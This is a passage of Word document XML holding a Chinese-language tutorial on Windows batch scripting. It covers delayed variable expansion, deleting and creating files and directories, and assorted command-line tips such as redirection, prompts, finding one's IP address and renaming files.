      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set var2=123</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>交换前：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> var1=%var1% var2=%var2%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set var1=%var2%&amp; set var2=%var1%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>交换后：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> var1=%var1% var2=%var2%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启动批处理文件中环境变量的本地化。本地化将持续到出现匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> endlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令或者到达批处理文件结尾为止。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: setlocal {enableextension | disableextensions} {enabledelayedexpansion | disabledelayedexpansion}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    enableextension: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启用命令扩展，直到出现匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> endlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令，无论</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> setlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令之前的设置如何。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    disableextensions: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>禁用命令扩展，直到出现匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> endlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令，无论</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> setlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令之前的设置如何。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    enabledelayedexpansion: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启用延迟的环境变量扩展，直到出现匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> endlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令，无论</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> setlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令之前的设置如何。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    disabledelayedexpansion: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>禁用延迟的环境变量扩展，直到出现匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> endlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令，无论</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> setlocal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令之前的设置如何。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为了能够感知环境变量的动态变化，批处理设计了变量延迟。简单来说，在读取了一条完整的语句之后，不立即对该行的变量赋值，而会在某个单条语句执行之前再进行赋值，也就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>延迟</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>了对变量的赋值。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  examle:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    setlocal enabledelayedexpansion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    set a=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    set a=5 &amp; echo !a!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结果：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变量延迟的启动语句是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“setlocal enabledelayedexpansion”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，并且变量要用一对叹号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“!!”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>括起来</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>由于启动了变量延迟，所以批处理能够感知到动态变化，即不是先给该行变量赋值，而是在运行过程中给变量赋值，因此此时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的值就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>另外，启动变量延迟，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“%”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的变量还是不变</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  example2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    setlocal enabledelayedexpansion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    for /l %%i in (1,1,5) do (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    set a=%%i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    echo !a!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结果，打印从</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；如果不变量延迟，一个变量也没有打印</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>九、文件处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除一个文件或多个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       del /s /q /f d:\test\a.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将直接删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>d:\test\a.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，没有任务提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       del temp\* /q /f /s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将直接删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>本目录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> temp </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录的所有文件，没有任务提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除文件的时候可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“*”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>作通配符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除一个空目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       rd /q /s  d:\test\log</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将直接删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>d:\test\log</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录，如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录里面有文件将无法删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除一个非空目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>必须指定目录名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       rmdir /q /s d:\test\logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>必须指定目录名称，不能使用通配符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       /S  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>除目录本身外，还将删除指定目录下的所有子目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       /Q  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>安静模式，带</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /S </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除目录树时不要求确认</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>无论里面是否有文件或文件夹将全部直接删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>创建目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    MKDIR [drive:]path</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    MD [drive:]path</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路径有空格时，可以用双引号括起来，也可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> &amp;nbsp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>替代</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>实践部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>======================================================================</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>一、小摘录：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用其他程序时，对文件的大小写不敏感，文件后缀也可忽略</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">start LeapFTP.exe  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> start leapftp </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>效果一样，都是运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“LeapFTP.exe”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>每行的开头的字符串会自动查找程序来运行，还可用双引号引起来</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名或目录名含空格时必须用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"D:\Program Files\Leap FTP.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       "LeapFTP.exe" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可正常运行文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">start "" "LeapFTP.exe" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>也可以正常运行文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注意，第一个参数是窗口显示的标题</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3. copy C:\test\*.* D:\back  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件夹的所有文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不包括文件夹及子文件夹里的东西</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>back</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件夹</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    4. dir c:\*.* &gt; a.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘文件列表写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> a.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    5.  &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>生成文件并写入内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果有这文件则覆盖</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  &gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件里追加内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    6. md d:\aa (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>创建文件夹</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在命令末尾加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“&gt;NUL 2&gt;NUL”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，表示隐蔽返回信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>等待用户输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> set /p </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变量名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>屏幕显示信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>set /p pass=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>让用户按回车退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>小技巧</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>替代</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>pause)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，文件的最后一句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>set /p tmp=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>操作结束，请按回车键退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    10.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置标题：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> title JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    11.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置屏幕显示颜色，如绿色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: color 0a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    12.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>清屏：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> cls</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    13.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       for /f "tokens=15" %%i in ('ipconfig ^| find /i "ip address"') do set ip=%%i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo %ip% (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这时的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %ip% </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就是自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    14. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改文件的更新日期</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        copy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>+,,&gt;nul  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改为当前时间，如果要修改为指定时间，先修改系统时间，再改回系统时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    15. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改文件的后缀名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        ren C:\test\*.jpg *.JPG</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:tab/>
        <w:t xml:space="preserve">for /r %%c in (*.jpg) do (ren %%c *.JPG)  :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改当前目录下的所有文件的后缀名，包括子目录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    16. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改文件的文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        rename test.jpg test2.JPG</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        rename *.jpg *.888.JPG</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    17. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
